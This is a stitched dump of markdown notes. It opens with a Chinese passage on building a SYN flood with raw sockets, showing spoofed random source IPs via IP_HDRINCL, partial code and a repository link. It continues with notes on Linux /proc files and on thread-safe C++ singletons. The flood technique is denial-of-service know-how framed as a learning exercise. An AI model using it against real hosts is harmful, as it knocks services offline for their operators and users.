21 | 22 | ## SYN FLOOD简易实现   23 |   首先我们肯定是不能走正常的`TCP`系统调用的,因为这样会触发`TCP`状态转换的正常流程。即使你设置一个`NONBLOCKING`的`socket`去`connect`目标`server`(`connect`发送完`SYN`后立即返回,然后可以关闭该`socket`,不发最后一个`ACK`),当`server`的`SYN/ACK`到达时,`kernel`发现此端口并未打开,会直接回一个`RST`给`server`,导致`server`关闭这条`TCP`连接,并不能留下一个半连接。
24 |   那么正确的做法是什么呢?
25 |   通过`raw socket`,`raw socket`可以直接绕过`TCP`发送各种`TCP`包,`raw socket`存在的目的本来是为测试用的,所以你必须有`root`权限才能使用。怎么才能有`root`权限呢?其一,`root`设置了某个应用的`SUID`位,类似于`passwd`;其二,你在`sudo`组里面;其三,你就是`root`。
26 |   下面看一下`IP`和`TCP`的header,摘自`RFC`:
27 |   (图:IP header 布局,摘自 RFC 791)
28 |   (图:TCP header 布局,摘自 RFC 793)
  29 |   各字段的具体含义我就不一一解释了,可以去翻`RFC`,因为我也是这么过来的。
30 |   下面说一下代码里面需要注意的地方:
31 | ``` 32 | int syn_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); 33 | rc = setsockopt(syn_socket, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); 34 | ``` 35 |   一定要设置`IP_HDRINCL`使用我们自己的`IP header`,这样才能造成一个FLOOD。为什么呢?因为我们必须随机`源IP地址`,让目标主机将`SYN/ACK`发往各个不同的`源IP地址`,如果路由是通的,那么`源IP地址`主机将会发一个`RST`导致连接关闭,不通则会导致多次超时重传,目标主机维护一堆没用的半连接,服务资源耗尽,目的达到。
36 | ``` 37 | syn_header.ip_header.check = 0; 38 | syn_header.ip_header.check = checksum((uint16_t *)&syn_header.ip_header, sizeof(syn_header.ip_header)); 39 | 40 | syn_header.tcp_header.th_sum = 0; 41 | syn_header.tcp_header.th_sum = tcp4_checksum(syn_header.ip_header, syn_header.tcp_header); 42 | ``` 43 |   一定要将`iphdr.check`和`tcphdr.th_sum`赋`0`,然后再计算`checksum`,`RFC`里有提到这一点,所以我们也这么实现。 44 | ``` 45 | syn_header.ip_header.tot_len = htons(IP_HDRLEN + TCP_HDRLEN); 46 | 47 | syn_header.tcp_header.th_sport = htons((uint16_t)config.local_port); 48 | syn_header.tcp_header.th_dport = htons((uint16_t)config.remote_port); 49 | ``` 50 |   设置`header`的时候多字节成员一定要进行网络地址转换`htons()`、`htonl()`之类。 51 | 52 | ## Talk Is Cheap, Show You My Code! 53 |   Github地址:[https://github.com/linghuazaii/syn-flood-implement](https://github.com/linghuazaii/syn-flood-implement)
54 |   刚开始犯了一个很愚蠢的错误:为什么我发完`SYN`也收到`SYN/ACK`了,`kernel`却发送了`RST`?当时是本机测本机,原因是:逗逼楼主,`raw socket`又不会触发`TCP`状态机,一个`CLOSED`状态的`socket`收到`SYN/ACK`,你还指望我给你回一个`ACK`,呵呵,`RST`死你~
56 |   但是我也并没能突破`kernel`的保护机制,`kernel`为每个`socket`维护的半连接队列增加到一定程度就不再自动增加了,到这里,学习目的就达到啦,有闲心可以翻翻`kernel`源码,应该可以很容易突破`kernel`的保护机制,道高一尺魔高一丈嘛。
58 | 59 | ## 闲话 60 | - `HTTPS`出现的一个原因是因为可以监控网络上的`TCP`包,窃取`SYN Sequence`值和其他信息来造成中间人攻击,所以`HTTPS`出现了,最主要的目的是提供认证。 61 | - `raw socket`还可以用来对四次握手制造`SYN FLOOD`。 62 | - `raw socket`可以通过向指定端口发送`SYN`包并检查是否收到`SYN/ACK`来实现隐藏的端口扫描,并且不会被目标主机记录进日志文件。 63 | - `raw socket`可以用来搞事啊~ 64 | - 暂时就写这么多吧。   65 | 66 | ## 结语 67 |   **Merry Christmas!!!** 68 | -------------------------------------------------------------------------------- /system-monitor.md: -------------------------------------------------------------------------------- 1 | Sysem Monitor For Linux 2 | ======================= 3 | ``` 4 | buddyinfo 5 | cgroups 6 | cmdline 7 | consoles 8 | cpuinfo 9 | crypto 10 | devices 11 | diskstats 12 | dma 13 | execdomains 14 | filesystems 15 | interrupts 16 | iomem 17 | ioports 18 | kallsyms 19 | kcore 20 | keys 21 | key-users 22 | kmsg 23 | kpagecount 24 | kpageflags 25 | latency_stats 26 | loadavg 27 | locks 28 | mdstat 29 | meminfo 30 | misc 31 | modules 32 | mounts 33 | mtrr 34 | net 35 | pagetypeinfo 36 | partitions 37 | sched_debug 38 | schedstat 39 | self 40 | slabinfo 41 | softirqs 42 | stat 43 | swaps 44 | sysrq-trigger 45 | timer_list 46 | timer_stats 47 | uptime 48 | version 49 | vmallocinfo 50 | vmstat 51 | zoneinfo 52 | ``` 53 | 54 | 55 | - `/proc/loadavg`: `0.24 0.33 0.46 2/847 25053`,前三列表示最后1分钟,5分钟,15分钟`CPU`和`IO`的利用率,第四列表示当前运行的`进程数/总进程数`,第五列表示最后一个用过的`进程ID`。 56 | 57 | - `/proc/buddyinfo`: 58 | ``` 59 | Node 0, zone DMA 0 0 0 1 2 1 1 0 1 1 3 60 | Node 0, zone DMA32 43388 23561 21073 4093 683 154 7 2 1 0 0 61 | Node 0, zone Normal 235635 106198 20708 50 0 0 0 0 0 1 0 62 | ``` 63 | `Node 0`表示只有一个`NUMA Node`,`zone DMA`有`16MB`内存,从低地址开始,被一些`legacy devices`使用;`zone DMA32`存在于64位机器,表示低地址开始`4GB`的内存;`zone Normal`在64位机器上表示从`4GB`开始的内存。其余几列的固定大小的内存块数目(relevant reading: [buddy algorithm](https://www.cs.fsu.edu/~engelen/courses/COP402003/p827.pdf)),分别为`free`状态的`4KB 8KB 16KB 32KB 64KB 128KB 256KB 512KB 1MB 2MB 4MB`内存块数目,Eg. 
the `DMA` zone has `32KB + 2 * 64KB + 128KB + 256KB + 1MB + 2MB + 3 * 4MB = 15MB 544KB` worth of memory blocks in the `free` state. This data can be used to gauge memory fragmentation.
- `/proc/cgroups`
```
subsys_name	hierarchy	num_cgroups	enabled
cpuset	0	1	1
cpu	0	1	1
cpuacct	0	1	1
memory	0	1	1
devices	0	1	1
freezer	0	1	1
net_cls	0	1	1
blkio	0	1	1
perf_event	0	1	1
hugetlb	0	1	1
```
The four columns are: the `controller name`; the `hierarchy` ID, where all zeros means every `controller` is mounted on the `cgroups v2` single unified hierarchy; `num_cgroups`, the number of `control groups` attached to this `controller`; and `enabled`, the `controller`'s state. (relevant reading: [cgroups](http://man7.org/linux/man-pages/man7/cgroups.7.html))

- `/proc/cmdline`:
```
root=LABEL=/ console=ttyS0 LANG=en_US.UTF-8 KEYTABLE=us
```
The parameters passed to the `kernel` when it was booted.

- `/proc/consoles`:
```
ttyS0                -W- (EC p a)    4:64
```
The attached `consoles`. `ttyS0` is the `device name`; `W` means writable; `E`, `C`, `p`, `a` mean `Enabled`, `Preferred console`, `used for printk buffer`, and `safe to use when cpu is offline` respectively; `4:64` is the `major number:minor number`. (relevant reading: [/proc/consoles](https://www.kernel.org/doc/Documentation/filesystems/proc.txt))

- `/proc/cpuinfo`:
```
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 63
model name	: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz
stepping	: 2
microcode	: 0x25
cpu MHz		: 2400.058
cache size	: 30720 KB
physical id	: 0
siblings	: 4
core id		: 0
cpu cores	: 2
apicid		: 0
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm constant_tsc rep_good nopl xtopology eagerfpu pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm xsaveopt fsgsbase bmi1 avx2 smep bmi2 erms invpcid
bogomips	: 4800.11
clflush size	: 64
cache_alignment	: 64
address sizes	: 46 bits physical, 48 bits virtual
power management:
```
`cpu family`, `model`, and `stepping` identify the `cpu` microarchitecture; `microcode` records the loaded microcode version; `cache size` is the size of the largest on-chip cache, here `30MB` (on this Xeon that is the shared L3, not L2); `physical id`, `processor`, `cpu cores`, `siblings`, and `core id` together show a single physical `cpu` with 2 `cpu cores` and 4 `siblings`, i.e. hyper-threading lets four hardware threads run at once across the two cores; `flags` lists the features this `cpu` supports; `bogomips` is a rough boot-time measurement, in millions of iterations per second, of how fast the `cpu` runs a do-nothing loop; `cache_alignment` is the cache alignment in bytes, here `64` bytes, i.e. one cache line; `address sizes` gives the address-bus widths: `46 bits physical` means at most `2^46 bytes = 65536GB` of physical memory can be addressed, and `48 bits virtual` means the `virtual memory` address space is at most `2^48 bytes = 262144GB`.

- `/proc/crypto`:
```
name         : ecb(arc4)
driver       : ecb(arc4-generic)
module       : ecb
priority     : 0
refcnt       : 1
selftest     : passed
type         : blkcipher
blocksize    : 1
min keysize  : 1
max keysize  : 256
ivsize       : 0
geniv        :
```
The cryptographic algorithms supported by the `kernel`.

- `/proc/devices`:
```
Character devices:
  1 mem
  4 /dev/vc/0
  4 tty
  4 ttyS
  5 /dev/tty
  5 /dev/console
  5 /dev/ptmx
  7 vcs
 10 misc
 13 input
108 ppp
128 ptm
136 pts
202 cpu/msr
203 cpu/cpuid
253 hidraw
254 bsg

Block devices:
259 blkext
  9 md
202 xvd
253 device-mapper
254 mdp
```
The devices registered with the system, split into `Character devices` and `Block devices`; for the distinction see [/proc/devices](https://www.centos.org/docs/5/html/5.1/Deployment_Guide/s2-proc-devices.html)

- `/proc/diskstats`:
```
202       0 xvda 14461686 42539668 1278044167 78747120 281646345 132327060 17709904384 2309947396 0 124008400 2388329900
202       1 xvda1 14461153 42539028 1278039312 78746860 281646343 132327052 17709904304 2309947396 0 124008176 2388340472
```
The `I/O` statistics of each `block device`. The columns are: `major number`, `minor number`, `device name`, `reads completed`, `reads merged`, `sectors read`, `total time reading (ms)`, `writes completed`, `writes merged`, `sectors written`, `total time writing (ms)`, `I/Os currently in progress`, `total time doing I/O (ms)`, and `weighted total I/O time (ms)`.


--------------------------------------------------------------------------------
/you-really-know-how-to-write-singleton.md:
--------------------------------------------------------------------------------

Do You Really Know How to Write a Singleton?
============================================

### The common Singleton
```cpp
/* singleton.h */
class Singleton {
public:
    static Singleton *getInstance();
private:
    Singleton() {}
    ~Singleton() {}
private:
    static Singleton *singleton;
};

/* singleton.cpp */
Singleton *Singleton::singleton = NULL;
Singleton *Singleton::getInstance() {
    if (singleton == NULL)
        singleton = new Singleton();
    return singleton;
}
```

### The DCLP problem everybody knows
Put the example above in a multithreaded environment and several threads may execute `singleton = new Singleton()` at the same time, leaking a tiny bit of memory (and breaking uniqueness). Fine, let's add a lock:
```cpp
/* singleton.h */
class Singleton {
public:
    static Singleton *getInstance();
private:
    Singleton() {}
    ~Singleton() {}
private:
    static Singleton *singleton;
    static pthread_mutex_t mutex;
};

/* singleton.cpp */
Singleton *Singleton::singleton = NULL;
pthread_mutex_t Singleton::mutex = PTHREAD_MUTEX_INITIALIZER;
Singleton *Singleton::getInstance() {
    if (singleton == NULL) {
        pthread_mutex_lock(&mutex);
        singleton = new Singleton();
        pthread_mutex_unlock(&mutex);
    }
    return singleton;
}
```

This still has a problem: several threads may be waiting on the `mutex` at the same time, and each one that acquires it will call `singleton = new Singleton()` again, leaking a tiny bit of memory. Fine, let's add a second check inside the lock:
```cpp
/* singleton.cpp */
Singleton *Singleton::singleton = NULL;
pthread_mutex_t Singleton::mutex = PTHREAD_MUTEX_INITIALIZER;
Singleton *Singleton::getInstance() {
    if (singleton == NULL) {
        pthread_mutex_lock(&mutex);
        if (singleton == NULL)
            singleton = new Singleton();
        pthread_mutex_unlock(&mutex);
    }
    return singleton;
}
```

Nice work. But on today's multi-core CPU architectures there is a cache-line visibility problem between CPUs, and the instructions behind the `new` operator can be reordered, so a thread on another CPU core may see a non-NULL pointer to a not-yet-constructed `Singleton`. Fine, let's bring in the memory model (note that `singleton` must now be declared `std::atomic<Singleton *>` in the header for `load`/`store` to compile):
```cpp
/* singleton.cpp */
#include <atomic>
std::atomic<Singleton *> Singleton::singleton(NULL);
pthread_mutex_t Singleton::mutex = PTHREAD_MUTEX_INITIALIZER;
Singleton *Singleton::getInstance() {
    Singleton *temp = singleton.load(std::memory_order_relaxed);
    std::atomic_thread_fence(std::memory_order_acquire);
    if (temp == NULL) {
        pthread_mutex_lock(&mutex);
        temp = singleton.load(std::memory_order_relaxed);
        if (temp == NULL) {
            temp = new Singleton();
            std::atomic_thread_fence(std::memory_order_release);
            singleton.store(temp, std::memory_order_relaxed);
        }
        pthread_mutex_unlock(&mutex);
    }
    return temp;
}
```

That is the final form of DCLP (the Double-Checked Locking Pattern). Notice that writing a Singleton now takes memory fences and atomic operations; quite a hassle. Let's look at another way.

### The lazy Singleton
```cpp
/* singleton.h */
class Singleton {
public:
    static Singleton *getInstance() {
        return &singleton;
    }
private:
    Singleton() {}
    ~Singleton() {}
private:
    static Singleton singleton;
};

/* singleton.cpp */
Singleton Singleton::singleton;
```

This elegantly sidesteps the DCLP problem, and it is thread-safe. Why? Here is an explanation from cppreference:
> Non-local variables
>
> All non-local variables with static storage duration are initialized as part of program startup, before the execution of the main function begins (unless deferred, see below). All variables with thread-local storage duration are initialized as part of thread launch, sequenced-before the execution of the thread function begins.

A class's static member is global: the compiler reserves space for it in the `.bss` section, and it is initialized during program startup, that is, after entering `_start` but before `call main`. This approach, however, hides a trap.

### The static initialization order fiasco
Suppose I have another Singleton-style class `SingletonB`:
```cpp
class SingletonB {
private:
    SingletonB() {
        Singleton *singleton = Singleton::getInstance();
        singleton->do_whatever();
    }
};
```

If `SingletonB` happens to be initialized before `Singleton` (the initialization order of non-local statics across different translation units is unspecified), then `Singleton` has not been constructed yet when `SingletonB`'s constructor uses it, and the program can crash before `call main` is even reached.

### How to fix it
The fix is simple: move `static Singleton singleton;` from global scope into function scope.
```cpp
/* singleton.h */
class Singleton {
public:
    static Singleton *getInstance() {
        static Singleton singleton;
        return &singleton;
    }
private:
    Singleton() {}
    ~Singleton() {}
};
/* no singleton.cpp needed */
```

Now `singleton` is initialized only on the first call to `Singleton::getInstance()`. Better yet, as of C++11 this is guaranteed to be thread-safe; cppreference again:
> If multiple threads attempt to initialize the same static local variable concurrently, the initialization occurs exactly once (similar behavior can be obtained for arbitrary functions with std::call_once).
>
> Note: usual implementations of this feature use variants of the double-checked locking pattern, which reduces runtime overhead for already-initialized local statics to a single non-atomic boolean comparison.
> (since C++11)

[Here is the question I posted about this on StackOverflow](https://stackoverflow.com/questions/44838641/what-bugs-will-my-singleton-class-cause-if-i-write-it-like-this)

### Reference
- [Double Checked Locking Pattern](https://en.wikipedia.org/wiki/Double-checked_locking)
- [C++ memory model](http://en.cppreference.com/w/cpp/language/memory_model)
- [memory fence](https://en.wikipedia.org/wiki/Memory_barrier)
- [What Every Programmer Should Know About Memory](https://people.freebsd.org/~lstewart/articles/cpumemory.pdf)
- [C++ initialization](http://en.cppreference.com/w/cpp/language/initialization)
- [static initialization fiasco](https://isocpp.org/wiki/faq/ctors#static-init-order)

### Wrap-up
**GOOD LUCK, HAVE FUN!**
--------------------------------------------------------------------------------